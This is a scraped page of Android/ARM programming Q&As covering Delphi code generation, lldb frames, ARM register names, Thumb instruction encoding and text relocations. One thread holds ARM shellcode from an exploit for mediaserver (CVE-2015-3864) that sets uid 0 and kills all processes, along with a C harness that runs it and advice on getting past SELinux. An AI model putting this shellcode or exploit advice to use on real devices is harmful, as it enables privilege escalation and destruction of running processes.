How to affect Delphi XEx code generation for Android/ARM targets? - android

Update 2017-05-17. I no longer work for the company where this question originated, and do not have access to Delphi XEx. While I was there, the problem was solved by migrating to mixed FPC+GCC (Pascal+C), with NEON intrinsics for some routines where it made a difference. (FPC+GCC is highly recommended also because it enables using standard tools, particularly Valgrind.) If someone can demonstrate, with credible examples, how they are actually able to produce optimized ARM code from Delphi XEx, I'm happy to accept the answer.
Embarcadero's Delphi compilers use an LLVM backend to produce native ARM code for Android devices. I have large amounts of Pascal code that I need to compile into Android applications and I would like to know how to make Delphi generate more efficient code. Right now, I'm not even talking about advanced features like automatic SIMD optimizations, just about producing reasonable code. Surely there must be a way to pass parameters to the LLVM side, or somehow affect the result? Usually, any compiler will have many options to affect code compilation and optimization, but Delphi's ARM targets seem to be just "optimization on/off" and that's it.
LLVM is supposed to be capable of producing reasonably tight and sensible code, but it seems that Delphi is using its facilities in a weird way. Delphi wants to use the stack very heavily, and it generally only utilizes the processor's registers r0-r3 as temporary variables. Perhaps the craziest of all, it seems to be loading normal 32 bit integers as four 1-byte load operations. How to make Delphi produce better ARM code, and without the byte-by-byte hassle it is making for Android?
At first I thought the byte-by-byte loading was for swapping byte order from big-endian, but that was not the case, it is really just loading a 32 bit number with 4 single-byte loads.* It might be to load the full 32 bits without doing an unaligned word-sized memory load. (whether it SHOULD avoid that is another thing, which would hint to the whole thing being a compiler bug)*
Let's look at this simple function:
function ReadInteger(APInteger : PInteger) : Integer;
begin
Result := APInteger^;
end;
Even with optimizations switched on, Delphi XE7 with update pack 1, as well as XE6, produce the following ARM assembly code for that function:
Disassembly of section .text._ZN16Uarmcodetestform11ReadIntegerEPi:
00000000 <_ZN16Uarmcodetestform11ReadIntegerEPi>:
0: b580 push {r7, lr}
2: 466f mov r7, sp
4: b083 sub sp, #12
6: 9002 str r0, [sp, #8]
8: 78c1 ldrb r1, [r0, #3]
a: 7882 ldrb r2, [r0, #2]
c: ea42 2101 orr.w r1, r2, r1, lsl #8
10: 7842 ldrb r2, [r0, #1]
12: 7803 ldrb r3, [r0, #0]
14: ea43 2202 orr.w r2, r3, r2, lsl #8
18: ea42 4101 orr.w r1, r2, r1, lsl #16
1c: 9101 str r1, [sp, #4]
1e: 9000 str r0, [sp, #0]
20: 4608 mov r0, r1
22: b003 add sp, #12
24: bd80 pop {r7, pc}
Just count the number of instructions and memory accesses Delphi needs for that. And constructing a 32 bit integer from 4 single-byte loads... If I change the function a little bit and use a var parameter instead of a pointer, it is slightly less convoluted:
Disassembly of section .text._ZN16Uarmcodetestform14ReadIntegerVarERi:
00000000 <_ZN16Uarmcodetestform14ReadIntegerVarERi>:
0: b580 push {r7, lr}
2: 466f mov r7, sp
4: b083 sub sp, #12
6: 9002 str r0, [sp, #8]
8: 6801 ldr r1, [r0, #0]
a: 9101 str r1, [sp, #4]
c: 9000 str r0, [sp, #0]
e: 4608 mov r0, r1
10: b003 add sp, #12
12: bd80 pop {r7, pc}
I won't include the disassembly here, but for iOS, Delphi produces identical code for the pointer and var parameter versions, and they are almost but not exactly the same as the Android var parameter version.
Edit: to clarify, the byte-by-byte loading is only on Android. And only on Android, the pointer and var parameter versions differ from each other. On iOS both versions generate exactly the same code.
For comparison, here's what FPC 2.7.1 (SVN trunk version from March 2014) thinks of the function with optimization level -O2. The pointer and var parameter versions are exactly the same.
Disassembly of section .text.n_p$armcodetest_$$_readinteger$pinteger$$longint:
00000000 <P$ARMCODETEST_$$_READINTEGER$PINTEGER$$LONGINT>:
0: 6800 ldr r0, [r0, #0]
2: 46f7 mov pc, lr
I also tested an equivalent C function with the C compiler that comes with the Android NDK.
int ReadInteger(int *APInteger)
{
return *APInteger;
}
And this compiles into essentially the same thing FPC made:
Disassembly of section .text._Z11ReadIntegerPi:
00000000 <_Z11ReadIntegerPi>:
0: 6800 ldr r0, [r0, #0]
2: 4770 bx lr

We are investigating the issue. In short, it depends on the potential mis-alignment (to 32 boundary) of the Integer referenced by a pointer. Need a little more time to have all of the answers... and a plan to address this.
Marco Cantù, moderator on Delphi Developers
Also reference Why are the Delphi zlib and zip libraries so slow under 64 bit? as Win64 libraries are shipped built without optimizations.
In the QP Report: RSP-9922
Bad ARM code produced by the compiler, $O directive ignored?, Marco added following explanation:
There are multiple issues here:
As indicated, optimization settings apply only to entire unit files and not to individual functions. Simply put, turning optimization on and off in the same file will have no effect.
Furthermore, simply having "Debug information" enabled turns off optimization. Thus, when one is debugging, explicitly turning on optimizations will have no effect. Consequently, the CPU view in the IDE will not be able to display a disassembled view of optimized code.
Third, loading non-aligned 64bit data is not safe and does result in errors, hence the separate 4 one byte operations that are needed in given scenarios.

Related

run a shellcode in the context of mediaerver in android

I write an exploit for a vulnerability in mediaserver in android(CVE-2015-3864). The goal is running a shellcode with root privilege(such as kill all processes). every steps of exploit are working as expected until it reaches the shell code(at this time the shellcode is loaded in mediaserver virtual memory and rwx permission is granted to it). Shell code is as follows:
1) e28f3001 add r3, pc, #1 ; 0x1
2) e12fff13 bx r3
3) 1b24 subs r4, r4, r4
4) 1c20 adds r0, r4, #0
5) 2717 movs r7, #23
6) df01 svc 1
7) 1a92 subs r2, r2, r2
8) 1c10 adds r0, r2, #0
9) 3801 subs r0, #1
10) 2109 movs r1, #9
11) 2725 movs r7, #37
12) df01 svc 1
lines 1 and 2 is a switch between arm mode and thumb mode. lines 3 to 6 is setuid(0) and lines 7 to 12 kill all running processes.
I debug the exploit with IDA and i found out that the shellscript executed until line 12 ( all the register have the expected values which are defined in the shellcode for example r7 is 37).
MY SPECIFIC PROBLEM IS : shellcode does not execute and has no impact on my device.
for a test case i write a program and run the shellcode as a function pointer like below:
`char *SC = "\x01\x30\x8f\xe2"
"\x13\xff\x2f\xe1"
"\x24\x1b\x20\x1c"
"\x17\x27\x01\xdf"
"\x92\x1a\x10\x1c"
"\x01\x38\x09\x21"
"\x25\x27\x01\xdf"`
`
int main(void)
{
fprintf(stdout,"Length: %d\n",strlen(SC))
(*(void(*)()) SC)()
return 0
}`
i copied this binary to /system/bin and grant exactly the same permission as mediaserver has. i run the binary with su permission and it works! all the processes were killed.
MY SPECIFIC QUESTION IS : Why shellcode can not be executed in the context of mediaserver but it can be executed independently?
please help, i really stuck in this state! if the question is unclear, feedback me to explain it more.
thank in advance
I think you need to elevate the privilege of mediaserver(user media) for kill all process(then you need another vulnerability). There is another problem due to SELinux sandbox restrictions this means that the mediaserver process whe exploit libstagefright is protected by SELinux policy and the code execution takes place in a restrictive sandbox. In other word you should be find a way for SELinux bypass, in nccgroup presentation you can find more details.
See also this good paper

lldb in Android Studio: select frame does not work

I'm doing native debugging in Android Studio 1.5. The problem is that the lldb looks at the wrong frame (the bottom-most) and thus does not show me the correct register values.
select frame
Does not seem to have any effect:
(lldb) bt
* thread #1: tid = 30637, 0x400e429e libc.sostrncpy, name = 'WHATEVER', stop reason = breakpoint 2.1
frame #0: 0x400e429e libc.sostrncpy
* frame #1: 0x406ba1b0 libicuuc.so
(lldb) frame info
frame #1: 0x406ba1b0 libicuuc.so
(lldb) frame select 0
frame #0: 0x400e429e libc.so`strncpy
libc.so`strncpy:
-> 0x400e429e <+0>: push {r4, lr}
0x400e42a0 <+2>: cbz r2, 0x400e42c4 ; <+38>
0x400e42a2 <+4>: subs r1, #0x1
0x400e42a4 <+6>: mov r3, r0
(lldb) frame info
frame #1: 0x406ba1b0 libicuuc.so
(lldb) register read
General Purpose Registers:
r4 = 0x40773ed4
r5 = 0x407762a8
r6 = 0x00000000
r7 = 0x40745eb0
r8 = 0xbe9f2d30
r9 = 0xbe9f2b20
r10 = 0x400f8384 libc.so`__stack_chk_guard
r11 = 0x77205d00
sp = 0xbe9f2d30
lr = 0x406ba1b1
pc = 0x75cdbd38
cpsr = 0x200b0030
5 registers were unavailable.
Any ideas/suggestions?
It sounds like Android Studio is resetting the frame after each command - probably to keep it in sync with what the UI is showing. You selected frame 0, but then your frame info command, which should show frame 0's info, shows frame 1's instead.
If you select some frame in the Android Studio UI, and then do frame info in the console, does it show the frame you selected in the UI? If that works then register read should also report the correct frame's registers, so you can use that as a work around for now.
If Android Studio has a bug reporter, you might file a bug about this issue. lldb has support for keeping a UI and the command line in sync, but the UI has to adopt it.

Android CPU register names?

This code fragment is extracted from an Android crash report on a Samsung Tab S:
Build fingerprint: 'samsung/chagallwifixx/chagallwifi:5.0.2/LRX22G/T800XXU1BOCC:user/release-keys'
Revision: '7'
ABI: 'arm'
r0 a0d840bc r1 a0dcb880 r2 00000001 r3 a0d840bc
r4 a0dc3c4c r5 00000000 r6 a066d200 r7 00000000
r8 32d68f40 r9 a0c359a8 sl 00000014 fp bef3ba84
ip a0dc3fb8 sp bef3ba10 lr a0c35a0c pc a0c34bc8 cpsr 400d0010
r0 through r9 are pretty clearly general purpose registers, sp (r13) is the stack pointer, and pc (r15) is the program counter (instruction pointer). Referring to the Wikipedia's ARM Architecture page Registers section (one of many pages I looked through), I find that lr (r14) is the link register, and cpsr is the "Current Program Status Register."
I would like to know what sl (r10), fp (r11) and ip (r12) are. I expect ip is not the "instruction pointer" because that function is done by pc (r15).
Is there a reference document I haven't found that illustrates these names?
The current ARM EABI procedure call standard outlines the standard 'special' names for r12-r15:
PC (r15): Program counter
LR (r14): Link register
SP (r13): Stack pointer
IP (r12): Intra-procedure scratch register*
The GNU tools also still support names from the deprecated legacy APCS as identifiers for the given register numbers, even though they no longer necessarily have any meaning:
FP (r11): Frame pointer - may still be true for ARM code; Thumb code tends to keep actual frame pointers in r7, and of course the code may be compiled without frame pointers at all, in which cases "fp" is just another callee-saved general register.
SL (r10): Stack limit - I don't actually know the history of that one, but in most modern code r10 is no more special than r4-r8.
Note that r9 is not necessarily a general-purpose register - the EABI reserves it for platform-specific purposes. Under linux-gnueabi it's nothing special, but other platforms may use it for special purposes like a TLS or global object table pointer, so it may also go by SB (static base) or TR (thread register).
* The story behind that the limited range of the PC-relative branch instructions - if the linker finds the target of a call ends up more than 32MB away, it may generate a veneer (some extra instructions within range of the call site) as the branch target, that computes the real address and performs an absolute branch, for which it may need a scratch register.

ARM and Android

So, I knew nothing about ARM instructions and have only just started trying to understand it. I've looked up a bit on ARM and some of the better links were these:
Converting very simple ARM instructions to binary/hex
http://simplemachines.it/doc/arm_inst.pdf
According to the first link, instructions have the following format and are 32-bits:
[cond][00][immediate][opcode][alerts condition codes?][Rn][Rd][Operand 2]
However, when I disassembled some .so files, I saw that most some of the instructions were 16 bits and had a different format.
Why the discrepancy? Is there a spec. for this?
An example would be how it encodes mov.
A simple mov r0 #255 is 20ff, only 16 bits as opposed to 32. Strange (to me).
As I understand it, you can't normally specify an entire 32-bit value in one instruction. I don't know the syntax for assemblers to compile.
What I've been doing is editing existing .so files using a hex editor.. And running them.
I tried to AND two values but just couldn't do it, something like:
mov r0 #63 ;0x003f
mov r1 #16896 ;0x4200
and r0, r0, r1, lsl #8 ;should be 0x423f at this point
mov r15, r14 ;method returns at this point, right?
Except, I didn't have an assembler and had to do it like this:
Find method that returns int in disassembled .so file
Over-write entries
Run and see output
So, this is what I got:
mov r0 0x003f - 1110 00 1 1101 0 0000 0000 0000 00111111 - e3a0 003f
mov r1 0x0042 - 1110 00 1 1101 0 0000 0001 0000 01000010 - e3a0 1042
and r0, r0, r1, lsl #8 - 1110 00 0 0000 0 0000 0000 00001000 0001 - e000 0081
mov r15, r14 - 1110 00 0 1101 0 0000 1111 0000 0000 1110 - e1a0f00e
So.. Yeah, I thought about instructions, encoded them using a table, used a calculator to convert it into hex, used a hex editor, transferred to my phone and ran the app..
And I just kept getting a zero when the method was called. Am I missing something here?
So..
Yeah.
Why does android's ARM seem to have 16 bit instructions mixed with 32 bit instructions and why isn't my little attempt working?
Do realize that when you say 'ARM instructions' that isn't just one instruction set but a multitude depending on the architecture and what extensions are supported. The document you linked to starts off by mentioning architecture v4 which if you check your favorite wiki for 'ARM architecture' - it would point out that v4 is a 'legacy' architecture.
Android itself started support on ARMv6 with most modern devices running ARMv7 or ARMv7a. While I don't know for sure I would think that the 16 bit instructions are Thumb2 and not the original Thumb extension which was intended to improve code density as ARM was designing for the embedded market of 10 to 20 years ago where a megabyte would be a lot of memory.
If you are learning, I would reference ARM's documentation available at their website:
http://infocenter.arm.com/help/index.jsp?topic=/com.arm.doc.ddi0406b/index.html
and possibly look at the ARM instructions coming out of gcc:
http://gcc.gnu.org/onlinedocs/gcc/ARM-Options.html
and get a cross-compiler for ARM setup so that you can take a higher level language like C and generate ARM binaries.

mylib.so has text relocations. This is wasting memory and is a security risk. Please fix

My Android application (using native library) print this warning on Android 4.4 :
linker mylib.so has text relocations. This is wasting memory and is a security risk. Please fix.
Have you got an idea of what it is and how to fix it ?
Thanks,
This would appear to be a result of two ndk-gcc bugs mentioned at https://code.google.com/p/android/issues/detail?id=23203
and stated there to have been fixed as of ndk-r8c.
It would appear that the check for libraries with the issue has been added only recently.
Note: please do not edit this post to hide the link URL. It is explicit because the destination is what makes it authoritative.
Further Note Changing NDK versions is only a fix when the warning is due to the code of your application. It will have no effect if the warning is instead on a system component such as libdvm - that can only be fixed by a system update.
You need to make the code in your library position independent...add -fpic or -fPIC to your LOCALC_FLAGS in your Android.mk and you also need to ensure that you're not linking against any static or shared libraries that contain text relocations themselves. If they do and you can re-compile them, use one of the flags mentioned above.
In short, you need to compile your library with one of the -fpic or -fPIC flags, where PIC is an abbreviation for Position Independent Code.
The longer answer is that your yourlib.so has been compiled in a manner that does not conform to the Google Android standard for an ELF file, where this Dynamic Array Tag entry is unexpected. In the best case the library will still run, but it is still an error and future AOS version will probably not allow it to run.
DT_TEXTREL 0x16 (22)
To check whats in you library use something along the line of:
# readelf --wide -S yourlib.so
There are 37 section headers, starting at offset 0x40:
Section Headers:
[Nr] Name Type Address Off Size ES Flg Lk Inf Al
[ 0] NULL 0000000000000000 000000 000000 00 0 0 0
[ 1] .text PROGBITS 0000000000000000 002400 068f80 00 AX 0 0 16
[ 2] .rodata PROGBITS 0000000000000000 06b380 05ad00 00 WA 0 0 32
...
[16] .rela.text RELA 0000000000000000 26b8e8 023040 18 14 1 8
...
[36] .rela.debug_frame RELA 0000000000000000 25a608 0112e0 18 14 27 8
Key to Flags:
W (write), A (alloc), X (execute), M (merge), S (strings), l (large)
I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown)
O (extra OS processing required) o (OS specific), p (processor specific)
Please see my extensive answer on the topic, for more DT entry details. For details how to write proper dynamic libraries this is a must-read.
I got the same error with my application.
The application was using a native daemon that used a native library which was not implementing all the functions in its header file. When I added the required implementations to the native library everything just worked.
I don't know if you have the exact same issue but it just probably means the your native side has some mismatch.

Categories

Resources